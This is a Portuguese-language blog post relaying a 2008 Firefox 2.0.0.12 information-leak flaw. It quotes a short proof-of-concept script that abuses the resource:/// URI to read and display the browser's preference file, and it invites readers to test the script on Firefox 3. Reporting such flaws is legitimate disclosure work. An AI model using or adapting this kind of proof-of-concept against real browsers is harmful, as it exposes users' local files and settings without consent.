"Firefox Vulnerable By Default", esse foi o título do posto do blog Hacker Webzine.
Eu sou um amante do Firefox, e é ruim ver que pouco tempo depois da atualização 2.0.0.12 ele apresentou um nova falha de segurança.
Antes a falha era que os extensões podiam acessar os arquivos locais, agora a falha é bem pior! Com um simples JavaScript ja da pra ler ate o arquivo de configurações do browser, eu falo daquela configurações que tem que digitar about:config.
É bem simples usar a falha, através do endereço: resource:/// o Firefox mapeia para a pasta onde está instalado o Browser.
O JavaScript abaixo (que foi retirado do blog) faz com que exiba todas as configuções:
1: <script>
1:
2: /*
3: @name: Firefox <= 2.0.0.12 information leak pOc
4: @date: Feb. 07 2008
5: @author: Ronald van den Heetkamp
6: @url: http://www.0x000000.com
7: */
8:
9: pref = function(a,b) {
10: document.write( a + ' -> ' + b + '<br />');
11: };
</script>
2: <script src="view-source:resource:///greprefs/all.js"></script>
Peço por gentileza para quem tive o Firefox 3 instalado que teste o script e ve se também existe a falha e comente no blog!
Be the first to rate this post
- Currently 0/5 Stars.
- 1
- 2
- 3
- 4
- 5